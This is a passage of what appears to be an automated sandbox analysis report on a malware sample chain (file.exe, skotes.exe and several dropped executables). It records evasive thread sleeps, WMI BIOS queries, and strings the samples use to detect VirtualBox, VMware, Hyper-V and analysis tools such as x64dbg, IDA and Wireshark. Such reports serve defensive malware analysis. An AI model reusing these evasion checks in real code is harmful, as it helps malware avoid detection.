                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8060Thread sleep time: -6815406s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8080Thread sleep count: 106 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8080Thread sleep time: -212106s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8052Thread sleep count: 2901 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8052Thread sleep time: -5804901s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe TID: 7380Thread sleep time: -34126476536362649s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe TID: 7380Thread sleep time: -100000s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe TID: 7380Thread sleep time: -99868s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe TID: 7380Thread sleep time: -99762s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe TID: 7380Thread sleep time: -99655s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe TID: 7380Thread sleep time: -99544s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe TID: 7380Thread sleep time: -99422s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe TID: 7380Thread sleep time: -99313s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe TID: 7380Thread sleep time: -99203s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe TID: 7380Thread sleep time: -99094s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe TID: 7380Thread sleep time: -98960s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe TID: 7380Thread sleep time: -98844s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe TID: 7380Thread sleep time: -98719s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe TID: 7380Thread sleep time: -98609s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe TID: 7380Thread sleep time: -98500s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe TID: 7380Thread sleep time: -98391s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe TID: 7380Thread sleep time: -98281s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe TID: 7380Thread sleep time: -98172s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe TID: 7380Thread sleep time: -98063s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe TID: 7380Thread sleep time: -97952s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe TID: 7380Thread sleep time: -97842s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe TID: 7380Thread sleep time: -97733s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe TID: 7380Thread sleep time: -97610s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe TID: 7380Thread sleep time: -97497s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe TID: 7380Thread sleep time: -97375s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe TID: 7380Thread sleep time: -97256s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe TID: 7380Thread sleep time: -97092s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe TID: 7380Thread sleep time: -96899s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe TID: 7380Thread sleep time: -96794s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe TID: 7380Thread sleep time: -96672s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe TID: 7380Thread sleep time: -96563s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe TID: 7380Thread sleep time: -96453s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe TID: 7380Thread sleep time: -96344s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe TID: 7380Thread sleep time: -96225s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe TID: 7380Thread sleep time: -96110s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe TID: 7380Thread sleep time: -95985s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe TID: 7380Thread sleep time: -95860s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe TID: 7380Thread sleep time: -95735s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe TID: 7380Thread sleep time: -95610s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe TID: 7380Thread sleep time: -95485s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe TID: 7380Thread sleep time: -95360s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe TID: 7380Thread sleep time: -95235s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe TID: 7380Thread sleep time: -95125s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe TID: 7380Thread sleep time: -94985s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe TID: 7380Thread sleep time: -94875s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe TID: 7380Thread sleep time: -94759s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe TID: 7380Thread sleep time: -94702s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe TID: 7380Thread sleep time: -94589s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe TID: 7380Thread sleep time: -94431s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe TID: 7380Thread sleep time: -94322s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3176Thread sleep time: -2767011611056431s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2212Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7800Thread sleep count: 8087 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7776Thread sleep count: 1633 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5224Thread sleep time: -1844674407370954s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2252Thread sleep time: -1844674407370954s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7016Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3352Thread sleep count: 7060 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 412Thread sleep count: 1598 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1784Thread sleep time: -3689348814741908s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2492Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1284Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exe TID: 4612Thread sleep count: 1176 > 30
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exe TID: 4612Thread sleep time: -2353176s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exe TID: 5432Thread sleep count: 1217 > 30
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exe TID: 5432Thread sleep time: -2435217s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exe TID: 5824Thread sleep time: -44000s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exe TID: 944Thread sleep count: 1168 > 30
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exe TID: 944Thread sleep time: -2337168s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exe TID: 7932Thread sleep count: 1196 > 30
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exe TID: 7932Thread sleep time: -2393196s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exe TID: 7612Thread sleep time: -30000s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exe TID: 5272Thread sleep count: 1191 > 30
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exe TID: 5272Thread sleep time: -2383191s >= -30000s
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exe TID: 4420Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exe TID: 4268Thread sleep time: -2767011611056431s >= -30000s
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exe TID: 504Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\svchost.exe TID: 3004Thread sleep time: -30000s >= -30000s
                      Source: C:\Windows\System32\svchost.exe TID: 2844Thread sleep time: -30000s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exe TID: 5016Thread sleep count: 807 > 30
                      Source: C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exe TID: 5016Thread sleep time: -1614807s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exe TID: 1308Thread sleep count: 749 > 30
                      Source: C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exe TID: 1308Thread sleep time: -1498749s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exe TID: 3272Thread sleep count: 175 > 30
                      Source: C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exe TID: 3272Thread sleep count: 58 > 30
                      Source: C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exe TID: 3272Thread sleep count: 61 > 30
                      Source: C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exe TID: 3272Thread sleep count: 63 > 30
                      Source: C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exe TID: 4480Thread sleep count: 863 > 30
                      Source: C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exe TID: 4480Thread sleep time: -1726863s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exe TID: 6036Thread sleep count: 821 > 30
                      Source: C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exe TID: 6036Thread sleep time: -1642821s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exe TID: 3128Thread sleep count: 3271 > 30
                      Source: C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exe TID: 3128Thread sleep time: -6545271s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exe TID: 4820Thread sleep count: 837 > 30
                      Source: C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exe TID: 4820Thread sleep time: -1674837s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe TID: 6872Thread sleep time: -46023s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe TID: 7296Thread sleep time: -90000s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe TID: 6544Thread sleep time: -30015s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe TID: 6588Thread sleep time: -40020s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe TID: 1196Thread sleep time: -38019s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9012Thread sleep count: 96 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3448Thread sleep count: 134 > 30
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exe TID: 7328Thread sleep time: -50025s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exe TID: 7320Thread sleep time: -52026s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exe TID: 7336Thread sleep time: -30015s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exe TID: 3208Thread sleep time: -32000s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exe TID: 5596Thread sleep time: -32016s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exe TID: 7332Thread sleep time: -54027s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe TID: 3008Thread sleep time: -90000s >= -30000s
                      Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\PING.EXELast function: Thread delayed
                      Source: C:\Windows\System32\PING.EXELast function: Thread delayed
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                      Source: C:\Users\user\Desktop\file.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 11_2_001D7978 FindFirstFileW,FindFirstFileW,free,11_2_001D7978
                      Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 11_2_001D881C free,free,GetLogicalDriveStringsW,GetLogicalDriveStringsW,free,free,free,11_2_001D881C
                      Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 11_2_001DB5E0 GetSystemInfo,11_2_001DB5E0
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread delayed: delay time: 30000Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeThread delayed: delay time: 100000Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeThread delayed: delay time: 99868Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeThread delayed: delay time: 99762Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeThread delayed: delay time: 99655Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeThread delayed: delay time: 99544Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeThread delayed: delay time: 99422Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeThread delayed: delay time: 99313Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeThread delayed: delay time: 99203Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeThread delayed: delay time: 99094Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeThread delayed: delay time: 98960Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeThread delayed: delay time: 98844Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeThread delayed: delay time: 98719Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeThread delayed: delay time: 98609Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeThread delayed: delay time: 98500Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeThread delayed: delay time: 98391Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeThread delayed: delay time: 98281Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeThread delayed: delay time: 98172Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeThread delayed: delay time: 98063Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeThread delayed: delay time: 97952Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeThread delayed: delay time: 97842Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeThread delayed: delay time: 97733Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeThread delayed: delay time: 97610Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeThread delayed: delay time: 97497Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeThread delayed: delay time: 97375Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeThread delayed: delay time: 97256Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeThread delayed: delay time: 97092Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeThread delayed: delay time: 96899Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeThread delayed: delay time: 96794Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeThread delayed: delay time: 96672Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeThread delayed: delay time: 96563Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeThread delayed: delay time: 96453Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeThread delayed: delay time: 96344Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeThread delayed: delay time: 96225Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeThread delayed: delay time: 96110Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeThread delayed: delay time: 95985Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeThread delayed: delay time: 95860Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeThread delayed: delay time: 95735Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeThread delayed: delay time: 95610Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeThread delayed: delay time: 95485Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeThread delayed: delay time: 95360Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeThread delayed: delay time: 95235Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeThread delayed: delay time: 95125Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeThread delayed: delay time: 94985Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeThread delayed: delay time: 94875Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeThread delayed: delay time: 94759Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeThread delayed: delay time: 94702Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeThread delayed: delay time: 94589Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeThread delayed: delay time: 94431Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeThread delayed: delay time: 94322Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeThread delayed: delay time: 922337203685477
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeThread delayed: delay time: 922337203685477
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
                      Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                      Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\main\Jump to behavior
                      Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
                      Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\Jump to behavior
                      Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\main\extractedJump to behavior
                      Source: file.exe, file.exe, 00000000.00000002.1766710949.0000000000243000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, skotes.exe, 00000001.00000002.1806427336.00000000008E3000.00000040.00000001.01000000.00000007.sdmp, 513dad5c05.exe, 00000038.00000000.2960899475.00000000005B3000.00000080.00000001.01000000.0000001F.sdmp, 77594b3442.exe, 00000039.00000002.3105827870.0000000000DB1000.00000040.00000001.01000000.0000001E.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                      Source: 9c2981f3e5.exe, 0000002A.00000003.2686987170.0000000007370000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
                      Source: 9c2981f3e5.exe, 0000002A.00000003.2718978923.0000000006921000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Y\MACHINE\SYSTEM\ControlSet001\Services\VBoxSFlM!Nq
                      Source: 4268204ace.exe, 0000000F.00000002.2724972964.0000000000F35000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: 9d4ddc637a.exe, 0000003A.00000003.3172152850.000000000145D000.00000004.00000020.00020000.00000000.sdmp, 9d4ddc637a.exe, 0000003A.00000003.3172750796.0000000001462000.00000004.00000020.00020000.00000000.sdmp, 9d4ddc637a.exe, 0000003A.00000003.3173171015.0000000001484000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW[
                      Source: 7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2776399397.0000000000790000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWq
                      Source: explorer.exe, 00000024.00000002.2597232510.0000000000E09000.00000004.00000020.00020000.00000000.sdmp, 7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2776399397.0000000000790000.00000004.00000020.00020000.00000000.sdmp, 0577f55121.exe, 0000002E.00000003.3202086239.0000000005562000.00000004.00000020.00020000.00000000.sdmp, 0577f55121.exe, 0000002E.00000003.3228694024.0000000005562000.00000004.00000020.00020000.00000000.sdmp, 0577f55121.exe, 0000002E.00000003.3146323550.0000000005562000.00000004.00000020.00020000.00000000.sdmp, 0577f55121.exe, 0000002E.00000003.3176254742.0000000005562000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000033.00000002.2933758160.0000000000BE9000.00000004.00000020.00020000.00000000.sdmp, 77594b3442.exe, 00000039.00000002.3103939592.000000000052F000.00000004.00000020.00020000.00000000.sdmp, 77594b3442.exe, 00000039.00000003.3063497186.0000000000575000.00000004.00000020.00020000.00000000.sdmp, 77594b3442.exe, 00000039.00000002.3104578420.0000000000575000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: 9c2981f3e5.exe, 0000002A.00000003.2686987170.0000000007370000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
                      Source: 9d4ddc637a.exe, 0000003A.00000003.3072055372.000000000149E000.00000004.00000020.00020000.00000000.sdmp, 9d4ddc637a.exe, 0000003A.00000003.3070055308.000000000149E000.00000004.00000020.00020000.00000000.sdmp, 9d4ddc637a.exe, 0000003A.00000003.3156789916.000000000149E000.00000004.00000020.00020000.00000000.sdmp, 9d4ddc637a.exe, 0000003A.00000003.3067000375.000000000149E000.00000004.00000020.00020000.00000000.sdmp, 9d4ddc637a.exe, 0000003A.00000003.3045078528.000000000149D000.00000004.00000020.00020000.00000000.sdmp, 9d4ddc637a.exe, 0000003A.00000003.3052397925.000000000149E000.00000004.00000020.00020000.00000000.sdmp, 9d4ddc637a.exe, 0000003A.00000003.3067634761.000000000149E000.00000004.00000020.00020000.00000000.sdmp, 9d4ddc637a.exe, 0000003A.00000003.3064614251.000000000149E000.00000004.00000020.00020000.00000000.sdmp, 9d4ddc637a.exe, 0000003A.00000003.3124704947.000000000149E000.00000004.00000020.00020000.00000000.sdmp, 9d4ddc637a.exe, 0000003A.00000003.3068403237.000000000149E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWQIue
                      Source: 5119130eb96345a8a13dc770d0f33571.exe, 0000002C.00000002.2823276319.00000220F1D8B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlll
                      Source: file.exe, 00000000.00000002.1766710949.0000000000243000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000001.00000002.1806427336.00000000008E3000.00000040.00000001.01000000.00000007.sdmp, 77594b3442.exe, 00000039.00000002.3105827870.0000000000DB1000.00000040.00000001.01000000.0000001E.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
